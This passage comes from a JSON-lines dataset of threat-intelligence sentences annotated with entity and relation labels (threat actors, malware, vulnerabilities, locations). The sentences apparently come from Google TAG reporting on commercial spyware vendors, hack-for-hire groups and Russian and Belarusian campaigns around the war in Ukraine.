Android.","entities":[{"id":50250,"label":"threat-actor","start_offset":72,"end_offset":82},{"id":50251,"label":"SOFTWARE","start_offset":152,"end_offset":159},{"id":50248,"label":"TIME","start_offset":3,"end_offset":7},{"id":50249,"label":"threat-actor","start_offset":42,"end_offset":51},{"id":50252,"label":"attack-pattern","start_offset":134,"end_offset":147}],"relations":[],"Comments":[]} {"id":4465,"text":"Google was able to identify the vulnerability in use and fix the exploit quickly.","entities":[{"id":50253,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4466,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[{"id":50254,"label":"TIME","start_offset":3,"end_offset":16},{"id":50255,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50256,"label":"SOFTWARE","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} {"id":4467,"text":"iPhone users could be compromised by receiving a malicious iMessage text, without ever needing to click a malicious link.","entities":[{"id":50257,"label":"SOFTWARE","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} {"id":4468,"text":"Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.","entities":[{"id":50258,"label":"attack-pattern","start_offset":74,"end_offset":92}],"relations":[],"Comments":[]} {"id":4469,"text":"Based on our research and findings, we assessed this to be one of the most technically sophisticated exploits we had ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.","entities":[{"id":50259,"label":"threat-actor","start_offset":172,"end_offset":175}],"relations":[],"Comments":[]} {"id":4470,"text":"Although this Committee must be concerned with the exploits of NSO Group, it is not the only entity posing risks to our users.","entities":[{"id":50260,"label":"threat-actor","start_offset":63,"end_offset":72}],"relations":[],"Comments":[]} {"id":4471,"text":"For example, TAG discovered campaigns targeting Armenian users which utilized zero-day vulnerabilities in Chrome and Internet Explorer.","entities":[{"id":50266,"label":"campaign","start_offset":28,"end_offset":37},{"id":50261,"label":"identity","start_offset":13,"end_offset":16},{"id":50265,"label":"SOFTWARE","start_offset":117,"end_offset":134},{"id":50262,"label":"location","start_offset":48,"end_offset":56},{"id":50263,"label":"vulnerability","start_offset":78,"end_offset":102},{"id":50264,"label":"SOFTWARE","start_offset":106,"end_offset":112}],"relations":[{"id":935,"from_id":50266,"to_id":50262,"type":"targets"},{"id":936,"from_id":50266,"to_id":50263,"type":"exploits"},{"id":937,"from_id":50264,"to_id":50263,"type":"has"},{"id":938,"from_id":50265,"to_id":50263,"type":"has"}],"Comments":[]} {"id":4472,"text":"We assessed that a surveillance vendor packaged and sold these technologies.","entities":[],"relations":[],"Comments":[]} {"id":4473,"text":"Reporting by CitizenLab linked this activity to Candiru, an Israeli spyware vendor.","entities":[{"id":50267,"label":"identity","start_offset":13,"end_offset":23},{"id":50268,"label":"threat-actor","start_offset":48,"end_offset":55},{"id":50269,"label":"location","start_offset":60,"end_offset":67}],"relations":[{"id":939,"from_id":50268,"to_id":50269,"type":"located-at"}],"Comments":[]} {"id":4474,"text":"Other reporting from Microsoft has linked this spyware to the compromise of dozens of victims, including political dissidents, human rights activists, journalists, and academics.","entities":[{"id":50270,"label":"identity","start_offset":21,"end_offset":30}],"relations":[],"Comments":[]} {"id":4475,"text":"Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.","entities":[{"id":50274,"label":"SOFTWARE","start_offset":126,"end_offset":133},{"id":50271,"label":"vulnerability","start_offset":42,"end_offset":66},{"id":50272,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":50273,"label":"SOFTWARE","start_offset":88,"end_offset":95}],"relations":[{"id":940,"from_id":50272,"to_id":50271,"type":"has"},{"id":941,"from_id":50273,"to_id":50271,"type":"has"}],"Comments":[]} {"id":4476,"text":"We assess with high confidence that commercial surveillance company Cytrox packaged these vulnerabilities, and sold the hacking software to at least eight governments.","entities":[{"id":50275,"label":"threat-actor","start_offset":68,"end_offset":74}],"relations":[],"Comments":[]} {"id":4477,"text":"Among other targets, this spyware was used to compromise journalists and opposition politicians.","entities":[],"relations":[],"Comments":[]} {"id":4478,"text":"Our reporting is consistent with earlier analysis produced by CitizenLab and Meta.","entities":[{"id":50276,"label":"identity","start_offset":62,"end_offset":72},{"id":50277,"label":"identity","start_offset":77,"end_offset":81}],"relations":[],"Comments":[]} {"id":4479,"text":"TAG also recently released information on a segment of attackers we call “hack-for-hire” that focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50279,"label":"attack-pattern","start_offset":131,"end_offset":161},{"id":50278,"label":"identity","start_offset":0,"end_offset":3},{"id":50280,"label":"attack-pattern","start_offset":74,"end_offset":87}],"relations":[],"Comments":[]} {"id":4480,"text":"In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves.","entities":[{"id":50281,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} {"id":4481,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} {"id":4482,"text":"In June, we provided examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates.","entities":[{"id":50286,"label":"location","start_offset":89,"end_offset":109},{"id":50282,"label":"TIME","start_offset":3,"end_offset":7},{"id":50283,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50285,"label":"location","start_offset":73,"end_offset":79},{"id":50284,"label":"location","start_offset":66,"end_offset":71}],"relations":[],"Comments":[]} {"id":4483,"text":"The growth of commercial spyware vendors and hack-for-hire groups has necessitated growth in TAG to counter these threats.","entities":[{"id":50287,"label":"attack-pattern","start_offset":45,"end_offset":58},{"id":50288,"label":"identity","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} {"id":4484,"text":"Where once we only needed substreams to focus on threat actors such as China, Russia, and North Korea, TAG now has a dedicated analysis subteam dedicated to commercial vendors and operators.","entities":[{"id":50289,"label":"location","start_offset":71,"end_offset":76},{"id":50290,"label":"location","start_offset":78,"end_offset":84},{"id":50291,"label":"location","start_offset":90,"end_offset":101},{"id":50292,"label":"identity","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} {"id":4485,"text":" Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments.","entities":[],"relations":[],"Comments":[]} {"id":4486,"text":"These vendors operate with deep technical expertise to develop and operationalize exploits.","entities":[],"relations":[],"Comments":[]} {"id":4487,"text":"We believe its use is growing, fueled by demand from governments.","entities":[],"relations":[],"Comments":[]} {"id":4488,"text":"Seven of the nine zero-day vulnerabilities our Threat Analysis Group discovered in 2021 were originally developed by commercial providers and sold to and used by state-sponsored actors.","entities":[{"id":50293,"label":"identity","start_offset":47,"end_offset":68},{"id":50294,"label":"vulnerability","start_offset":18,"end_offset":42}],"relations":[],"Comments":[]} {"id":4489,"text":"TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to state-sponsored actors.","entities":[{"id":50295,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4490,"text":"This industry appears to be thriving.","entities":[],"relations":[],"Comments":[]} {"id":4491,"text":"In fact, there was recently a large industry conference in Europe, sponsored by many of the commercial spyware vendors we track.","entities":[{"id":50296,"label":"location","start_offset":59,"end_offset":65}],"relations":[],"Comments":[]} {"id":4492,"text":"This trend should be concerning to the United States and all citizens.","entities":[{"id":50297,"label":"location","start_offset":39,"end_offset":52}],"relations":[],"Comments":[]} {"id":4493,"text":"These vendors are enabling the proliferation of dangerous hacking tools, arming nation state actors that would not otherwise be able to develop these capabilities in-house.","entities":[],"relations":[],"Comments":[]} {"id":4494,"text":"While use of surveillance technologies may be legal under national or international laws, they are found to be used by some state actors for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers, and opposition party politicians.","entities":[],"relations":[],"Comments":[]} {"id":4495,"text":"We have also observed proliferation risk from nation state actors attempting to gain access to the exploits of these vendors.","entities":[],"relations":[],"Comments":[]} {"id":4496,"text":"Last year, TAG identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.","entities":[{"id":50298,"label":"identity","start_offset":11,"end_offset":14}],"relations":[],"Comments":[]} {"id":4497,"text":"The actors behind this campaign, which we attributed to a government-backed entity based in North Korea, have employed a number of means to target researchers.","entities":[{"id":50299,"label":"campaign","start_offset":23,"end_offset":31},{"id":50300,"label":"location","start_offset":92,"end_offset":103}],"relations":[{"id":942,"from_id":50299,"to_id":50300,"type":"attributed-to"}],"Comments":[]} {"id":4498,"text":"In addition to these concerns, there are other reasons why this industry presents a risk more broadly across the Internet.","entities":[],"relations":[],"Comments":[]} {"id":4499,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised.","entities":[{"id":50301,"label":"attack-pattern","start_offset":158,"end_offset":182}],"relations":[],"Comments":[]} {"id":4500,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[],"relations":[],"Comments":[]} {"id":4501,"text":"The proliferation of commercial hacking tools is a threat to national security, making the Internet less safe and undermining the trust on which a vibrant, inclusive digital society depends.","entities":[],"relations":[],"Comments":[]} {"id":4502,"text":"This is why when Google discovers these activities, we not only take steps to protect users, but also disclose that information publicly to raise awareness and help the entire ecosystem, in line with our historical commitment to openness and democratic values.","entities":[{"id":50302,"label":"identity","start_offset":17,"end_offset":23}],"relations":[],"Comments":[]} {"id":4503,"text":"Across all Google products, we incorporate industry-leading security features and protections to keep our users safe.","entities":[{"id":50303,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} {"id":4504,"text":"On Search, Google’s Safe Browsing is an industry-leading service to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50304,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} {"id":4505,"text":"Google Safe Browsing helps protect over four billion devices every day by showing warnings to users when they attempt to navigate to unsafe sites or download harmful files.","entities":[{"id":50305,"label":"SOFTWARE","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} {"id":4506,"text":"Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.","entities":[{"id":50306,"label":"SOFTWARE","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":4507,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":50307,"label":"identity","start_offset":3,"end_offset":8},{"id":50308,"label":"identity","start_offset":31,"end_offset":36},{"id":50309,"label":"attack-pattern","start_offset":69,"end_offset":77},{"id":50311,"label":"attack-pattern","start_offset":93,"end_offset":97},{"id":50310,"label":"attack-pattern","start_offset":79,"end_offset":87}],"relations":[],"Comments":[]} {"id":4508,"text":"Spoofers may send forged messages using an organization’s real name or domain to subvert authentication measures.","entities":[],"relations":[],"Comments":[]} {"id":4509,"text":"We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source.","entities":[],"relations":[],"Comments":[]} {"id":4510,"text":"And we offer other advanced phishing and malware protection to administrators to better protect their users.","entities":[],"relations":[],"Comments":[]} {"id":4511,"text":"By default, Gmail displays warnings and moves untrustworthy emails to the user’s spam folder.","entities":[{"id":50312,"label":"SOFTWARE","start_offset":12,"end_offset":17}],"relations":[],"Comments":[]} {"id":4512,"text":"However administrators can also use advanced security settings to enhance their users’ protection against suspicious attachments and scripts from untrusted senders.","entities":[],"relations":[],"Comments":[]} {"id":4513,"text":"For Android, through its entire development lifecycle, we subject the products to a rigorous security program.","entities":[{"id":50313,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":4514,"text":"The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.","entities":[{"id":50314,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":4515,"text":"We ensure appropriate controls are built into the architecture of the system.","entities":[],"relations":[],"Comments":[]} {"id":4516,"text":"During the development stage, Android-created and open source components are subject to vigorous security reviews","entities":[{"id":50315,"label":"SOFTWARE","start_offset":30,"end_offset":37}],"relations":[],"Comments":[]} {"id":4517,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":50316,"label":"SOFTWARE","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} {"id":4518,"text":"For example, users are provided visibility into the permissions requested by each app, and they are able to control those permissions.","entities":[],"relations":[],"Comments":[]} {"id":4519,"text":"We have also built additional tools to prevent successful attacks on devices that run Android once those devices are in users’ hands.","entities":[{"id":50317,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} {"id":4520,"text":"For example, Google Play Protect, our built-in malware protection for Android, continuously scans devices for potentially harmful applications.","entities":[{"id":50318,"label":"SOFTWARE","start_offset":13,"end_offset":32},{"id":50319,"label":"SOFTWARE","start_offset":70,"end_offset":77}],"relations":[],"Comments":[]} {"id":4521,"text":"Although our security precautions are robust, security issues can still occur, which is why we created a comprehensive security response process to respond to incidents.","entities":[],"relations":[],"Comments":[]} {"id":4522,"text":"Google manages a vulnerability rewards program (VRP), rewarding researchers millions of dollars for their contributions in securing our devices and platforms.","entities":[{"id":50320,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4523,"text":"We also provide research grants to security researchers to help fund and support the research community.","entities":[],"relations":[],"Comments":[]} {"id":4524,"text":"This is all part of a larger strategy to keep Google products and users, as well as the Internet at large more secure.","entities":[{"id":50321,"label":"identity","start_offset":46,"end_offset":52}],"relations":[],"Comments":[]} {"id":4525,"text":"Project Zero is also a critical component of this strategy, pushing transparency and more timely patching of vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":4526,"text":"Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations – in other words, the users who are frequently targeted by surveillance tools.","entities":[],"relations":[],"Comments":[]} {"id":4527,"text":"Google developed Project Shield, a free protection against distributed denial of service (DDoS) attacks, to protect news media and human rights organization websites.","entities":[{"id":50323,"label":"attack-pattern","start_offset":59,"end_offset":95},{"id":50322,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4528,"text":"We recently expanded eligibility to protect Ukraine government organizations, and we are currently protecting over 200 Ukraine websites today.","entities":[{"id":50324,"label":"identity","start_offset":44,"end_offset":76},{"id":50325,"label":"location","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} {"id":4529,"text":"To protect high risk user accounts, we offer the Advanced Protection Program (APP), which is our highest form of account security.","entities":[],"relations":[],"Comments":[]} {"id":4530,"text":"APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing.","entities":[{"id":50326,"label":"attack-pattern","start_offset":116,"end_offset":147}],"relations":[],"Comments":[]} {"id":4531,"text":" We believe it is time for government, industry and civil society to come together to change the incentive structure which has allowed these technologies to spread in secret.","entities":[],"relations":[],"Comments":[]} {"id":4532,"text":"The first step is to understand the scope of the problem.","entities":[],"relations":[],"Comments":[]} {"id":4533,"text":"We appreciate the Committee’s focus on this issue, and recommend the U.S. Intelligence Community prioritize identifying and analyzing threats from foreign commercial spyware providers as being on par with other major advanced threat actors.","entities":[{"id":50327,"label":"identity","start_offset":69,"end_offset":96}],"relations":[],"Comments":[]} {"id":4534,"text":"The U.S. should also consider ways to foster greater transparency in the marketplace, including setting heightened transparency requirements for the domestic surveillance industry.","entities":[{"id":50328,"label":"location","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} {"id":4535,"text":"The U.S. could also set an example to other governments by reviewing and disclosing its own historical use of these tools.","entities":[{"id":50329,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} {"id":4536,"text":"We welcome recent steps taken by the government in applying sanctions to the NSO Group and Candiru, and we believe other governments should consider expanding these restrictions.","entities":[{"id":50330,"label":"threat-actor","start_offset":77,"end_offset":86},{"id":50331,"label":"threat-actor","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} {"id":4537,"text":"Additionally, the U.S. government should consider a full ban on Federal procurement of commercial spyware technologies and contemplate imposing further sanctions to limit spyware vendors’ ability to operate in the U.S. and receive U.S. investment.","entities":[{"id":50332,"label":"identity","start_offset":18,"end_offset":33},{"id":50333,"label":"location","start_offset":214,"end_offset":218},{"id":50334,"label":"location","start_offset":231,"end_offset":235}],"relations":[],"Comments":[]} {"id":4538,"text":"The harms from this industry are amply evident by this point, and we believe they outweigh any benefit to continued use.","entities":[],"relations":[],"Comments":[]} {"id":4539,"text":"Finally, we urge the United States to lead a diplomatic effort to work with the governments of the countries who harbor problematic vendors, as well as those who employ these tools, to build support for measures that limit harms caused by this industry.","entities":[{"id":50335,"label":"location","start_offset":21,"end_offset":34}],"relations":[],"Comments":[]} {"id":4540,"text":"Any one government’s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.","entities":[],"relations":[],"Comments":[]} {"id":4541,"text":"Google is investing heavily as a company and as an industry to counter serious threats to our users.","entities":[{"id":50336,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4542,"text":"In the modern world, we must be able to trust the devices we use every day and ensure that foreign adversaries do not have access to sophisticated exploits.","entities":[],"relations":[],"Comments":[]} {"id":4543,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} {"id":4544,"text":"Google is committed to leading the industry in detecting and disrupting these threats.","entities":[{"id":50337,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4545,"text":"I thank the Committee for this attention on this critical issue.","entities":[],"relations":[],"Comments":[]} {"id":4546,"text":"Google’s Threat Analysis Group (TAG) continues to closely monitor the cybersecurity environment in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":50338,"label":"identity","start_offset":0,"end_offset":36},{"id":50339,"label":"location","start_offset":99,"end_offset":113},{"id":50340,"label":"location","start_offset":140,"end_offset":147}],"relations":[],"Comments":[]} {"id":4547,"text":"Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same.","entities":[{"id":50344,"label":"location","start_offset":153,"end_offset":160},{"id":50342,"label":"location","start_offset":62,"end_offset":69},{"id":50343,"label":"threat-actor","start_offset":121,"end_offset":132},{"id":50346,"label":"threat-actor","start_offset":5,"end_offset":36}],"relations":[{"id":943,"from_id":50346,"to_id":50342,"type":"targets"}],"Comments":[]} {"id":4548,"text":"TAG continues to disrupt campaigns from multiple sets of Russian government-backed attackers, some of which are detailed in our previous updates.","entities":[{"id":50347,"label":"identity","start_offset":0,"end_offset":3},{"id":50348,"label":"threat-actor","start_offset":57,"end_offset":92}],"relations":[],"Comments":[]} {"id":4549,"text":"Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin.","entities":[{"id":50351,"label":"threat-actor","start_offset":179,"end_offset":203},{"id":50349,"label":"location","start_offset":82,"end_offset":89},{"id":50350,"label":"identity","start_offset":94,"end_offset":97},{"id":50352,"label":"threat-actor","start_offset":210,"end_offset":233},{"id":50353,"label":"identity","start_offset":253,"end_offset":256}],"relations":[{"id":944,"from_id":50351,"to_id":50349,"type":"targets"},{"id":945,"from_id":50352,"to_id":50349,"type":"targets"}],"Comments":[]} {"id":4550,"text":"Most of these coordinated influence operations are Russian language efforts aimed at ensuring domestic support in Russia for the war.","entities":[{"id":50354,"label":"location","start_offset":114,"end_offset":120}],"relations":[],"Comments":[]} {"id":4551,"text":"Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.","entities":[{"id":50355,"label":"identity","start_offset":48,"end_offset":51},{"id":50356,"label":"threat-actor","start_offset":88,"end_offset":93},{"id":50357,"label":"identity","start_offset":135,"end_offset":165},{"id":50358,"label":"location","start_offset":126,"end_offset":132},{"id":50359,"label":"SOFTWARE","start_offset":183,"end_offset":190},{"id":50360,"label":"identity","start_offset":221,"end_offset":244}],"relations":[{"id":946,"from_id":50356,"to_id":50357,"type":"attributed-to"},{"id":947,"from_id":50357,"to_id":50358,"type":"located-at"},{"id":948,"from_id":50357,"to_id":50360,"type":"impersonates"}],"Comments":[]} {"id":4552,"text":"This is the first known instance of Turla distributing Android-related malware.","entities":[{"id":50361,"label":"threat-actor","start_offset":36,"end_offset":41},{"id":50362,"label":"SOFTWARE","start_offset":55,"end_offset":62}],"relations":[{"id":949,"from_id":50361,"to_id":50362,"type":"targets"}],"Comments":[]} {"id":4553,"text":"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.","entities":[{"id":50363,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} {"id":4554,"text":"We believe there was no major impact on Android users and that the number of installs was miniscule.","entities":[{"id":50364,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} {"id":4555,"text":"The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites.","entities":[{"id":50365,"label":"attack-pattern","start_offset":53,"end_offset":76}],"relations":[],"Comments":[]} {"id":4556,"text":"However, the 'DoS' consists only of a single GET request to the target website, not enough to be effective.","entities":[{"id":50366,"label":"attack-pattern","start_offset":14,"end_offset":17}],"relations":[],"Comments":[]} {"id":4557,"text":"The list of target websites for the app can be seen in the CyberChef recipe here.","entities":[{"id":50367,"label":"SOFTWARE","start_offset":59,"end_offset":68}],"relations":[],"Comments":[]} {"id":4558,"text":"During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.","entities":[{"id":50370,"label":"TIME","start_offset":116,"end_offset":126},{"id":50368,"label":"malware","start_offset":34,"end_offset":54},{"id":50369,"label":"SOFTWARE","start_offset":78,"end_offset":85},{"id":50371,"label":"attack-pattern","start_offset":156,"end_offset":159},{"id":50372,"label":"location","start_offset":176,"end_offset":183}],"relations":[{"id":950,"from_id":50368,"to_id":50369,"type":"targets"}],"Comments":[]} {"id":4559,"text":"In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro.","entities":[{"id":50373,"label":"SOFTWARE","start_offset":18,"end_offset":25},{"id":50375,"label":"malware","start_offset":52,"end_offset":68},{"id":50376,"label":"DOMAIN","start_offset":107,"end_offset":118},{"id":50374,"label":"malware","start_offset":39,"end_offset":50}],"relations":[],"Comments":[]} {"id":4560,"text":"This app is quite different from the Turla apps described above and written by a different developer.","entities":[{"id":50377,"label":"threat-actor","start_offset":37,"end_offset":42}],"relations":[],"Comments":[]} {"id":4561,"text":"It also downloads a list of targets from an external site, but unlike the Turla apps, it continually sends requests to the target websites until it is stopped by the user.","entities":[{"id":50378,"label":"threat-actor","start_offset":74,"end_offset":79}],"relations":[],"Comments":[]} {"id":4562,"text":"Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.","entities":[{"id":50379,"label":"malware","start_offset":43,"end_offset":54},{"id":50380,"label":"threat-actor","start_offset":130,"end_offset":142},{"id":50381,"label":"malware","start_offset":160,"end_offset":177}],"relations":[{"id":951,"from_id":50381,"to_id":50380,"type":"authored-by"}],"Comments":[]} {"id":4563,"text":"Indicators: The Follina vulnerability (CVE-2022-30190), first disclosed in late May, received significant usage from both APT and cybercrime groups throughout June after it was patched by Microsoft.","entities":[{"id":50382,"label":"vulnerability","start_offset":16,"end_offset":54},{"id":50383,"label":"TIME","start_offset":75,"end_offset":83},{"id":50384,"label":"TIME","start_offset":159,"end_offset":163},{"id":50385,"label":"identity","start_offset":188,"end_offset":197}],"relations":[],"Comments":[]} {"id":4564,"text":"Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).","entities":[{"id":50386,"label":"vulnerability","start_offset":13,"end_offset":54},{"id":50387,"label":"SOFTWARE","start_offset":62,"end_offset":110}],"relations":[{"id":952,"from_id":50387,"to_id":50386,"type":"has"}],"Comments":[]} {"id":4565,"text":"Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.","entities":[{"id":50390,"label":"identity","start_offset":35,"end_offset":38},{"id":50389,"label":"identity","start_offset":16,"end_offset":23},{"id":50391,"label":"identity","start_offset":57,"end_offset":68},{"id":50392,"label":"threat-actor","start_offset":78,"end_offset":83},{"id":50394,"label":"vulnerability","start_offset":132,"end_offset":153},{"id":50393,"label":"threat-actor","start_offset":88,"end_offset":96}],"relations":[{"id":956,"from_id":50393,"to_id":50391,"type":"attributed-to"},{"id":953,"from_id":50393,"to_id":50394,"type":"exploits"},{"id":954,"from_id":50392,"to_id":50394,"type":"exploits"},{"id":955,"from_id":50392,"to_id":50391,"type":"attributed-to"}],"Comments":[]} {"id":4566,"text":"The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.","entities":[{"id":50395,"label":"campaign","start_offset":4,"end_offset":21},{"id":50396,"label":"attack-pattern","start_offset":27,"end_offset":58},{"id":50397,"label":"SOFTWARE","start_offset":76,"end_offset":92},{"id":50398,"label":"location","start_offset":177,"end_offset":184}],"relations":[{"id":957,"from_id":50395,"to_id":50396,"type":"uses"},{"id":958,"from_id":50395,"to_id":50397,"type":"targets"}],"Comments":[]} {"id":4567,"text":"TAG has also observed an increasing number of financially motivated actors targeting Ukraine.","entities":[{"id":50399,"label":"identity","start_offset":0,"end_offset":3},{"id":50400,"label":"location","start_offset":85,"end_offset":92}],"relations":[],"Comments":[]} {"id":4568,"text":"One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine.","entities":[{"id":50401,"label":"identity","start_offset":44,"end_offset":51},{"id":50402,"label":"threat-actor","start_offset":55,"end_offset":63},{"id":50403,"label":"vulnerability","start_offset":103,"end_offset":118},{"id":50404,"label":"identity","start_offset":169,"end_offset":197}],"relations":[{"id":959,"from_id":50402,"to_id":50404,"type":"impersonates"},{"id":960,"from_id":50402,"to_id":50403,"type":"uses"}],"Comments":[]} {"id":4569,"text":"We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.","entities":[{"id":50405,"label":"threat-actor","start_offset":97,"end_offset":102},{"id":50406,"label":"malware","start_offset":137,"end_offset":158}],"relations":[{"id":961,"from_id":50405,"to_id":50406,"type":"uses"}],"Comments":[]} {"id":4570,"text":"Ghostwriter\/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.","entities":[{"id":50408,"label":"threat-actor","start_offset":12,"end_offset":19},{"id":50407,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":50409,"label":"location","start_offset":50,"end_offset":57},{"id":50410,"label":"location","start_offset":138,"end_offset":144}],"relations":[{"id":962,"from_id":50408,"to_id":50407,"type":"duplicate-of"},{"id":963,"from_id":50407,"to_id":50409,"type":"attributed-to"},{"id":964,"from_id":50408,"to_id":50409,"type":"attributed-to"},{"id":965,"from_id":50408,"to_id":50410,"type":"targets"},{"id":966,"from_id":50407,"to_id":50410,"type":"targets"}],"Comments":[]} {"id":4571,"text":"They continue to use the 'Browser in the Browser' phishing technique that TAG first observed and described in March.","entities":[{"id":50413,"label":"TIME","start_offset":110,"end_offset":115},{"id":50411,"label":"attack-pattern","start_offset":26,"end_offset":68},{"id":50412,"label":"identity","start_offset":74,"end_offset":77}],"relations":[],"Comments":[]} {"id":4572,"text":"An example of this technique, used to target Facebook users, can be seen in the screenshot below.","entities":[{"id":50414,"label":"SOFTWARE","start_offset":45,"end_offset":53}],"relations":[],"Comments":[]} {"id":4573,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[{"id":50416,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50415,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50417,"label":"attack-pattern","start_offset":88,"end_offset":119}],"relations":[{"id":967,"from_id":50416,"to_id":50415,"type":"duplicate-of"},{"id":968,"from_id":50415,"to_id":50417,"type":"uses"}],"Comments":[]} {"id":4574,"text":"In addition to including phishing links directly in the email, the attackers also link to PDFs and\/or DOCs, hosted on Google Drive and Microsoft One Drive, that contain a link to an attacker-controlled phishing domain.","entities":[{"id":50420,"label":"SOFTWARE","start_offset":118,"end_offset":130},{"id":50419,"label":"attack-pattern","start_offset":25,"end_offset":39},{"id":50421,"label":"SOFTWARE","start_offset":135,"end_offset":154}],"relations":[],"Comments":[]} {"id":4575,"text":"In at least one case, unrelated to Ukraine, they have leaked information from a compromised account.","entities":[{"id":50422,"label":"location","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} {"id":4576,"text":"These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[],"relations":[],"Comments":[]} {"id":4577,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt 